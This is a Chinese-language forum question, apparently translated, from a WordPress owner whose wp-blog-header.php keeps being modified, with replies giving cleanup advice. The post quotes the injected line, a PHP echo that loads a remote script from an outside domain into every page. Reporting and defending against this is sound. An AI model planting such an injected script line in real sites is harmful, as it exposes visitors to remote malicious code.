由於某種原因,我的網站被黑了。我的WordPress網站被黑客攻擊了
我檢查了我的FTP文件,我注意到wp-blog-header.php
最近被修改了。
這是我wp-blog-header.php
它遭到黑客攻擊前:
<?php
/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/
if (!isset($wp_did_header)) {
$wp_did_header = true;
require_once(dirname(__FILE__) . '/wp-load.php');
wp();
require_once(ABSPATH . WPINC . '/template-loader.php');
}
這是我的文件,它已被黑客攻擊後:
<?php echo "<script type='text/javascript' src='http://www.oxxtm.com/images/wp-logo.js'></script>";
/**
* Loads the WordPress environment and template.
...
所以,他們添加了此行我的文件:
echo "<script type='text/javascript' src='http://www.oxxtm.com/images/wp-logo.js'></script>";
當我刪除這行,我的網站工作正常,但在幾個小時內,他們添加此行試。我檢查了我的數據庫行,但我找不到任何錯誤。 在我看來,這是一個新的失敗。我昨天搜索了它,但我找不到太多,只有一些法國網站,他們沒有任何明確的解決這個問題。那麼,有沒有人經歷過它?
這些是我使用本網站的插件和它們各自的版本:
WordPress v4.1.8
Advanced Custom Fields v4.0.0
確保wordpress是最新的。更改所有密碼。確認沒有其他用戶帳戶具有您未配置的FTP訪問權限。如果問題仍然存在,請與您的託管公司聯繫。 – CollinD
你有備份嗎?您是否在Dreamhost等共享託管網站上託管?正如上面建議的那樣,您最有可能被重做 - 更改密碼,擦除並重新安裝(如果可能),並聯系您的託管服務提供商。 – nykc
WordPress有關於如何處理被黑客入侵的WordPress網站的詳細FAQ。 https://codex.wordpress.org/FAQ_My_site_was_hacked –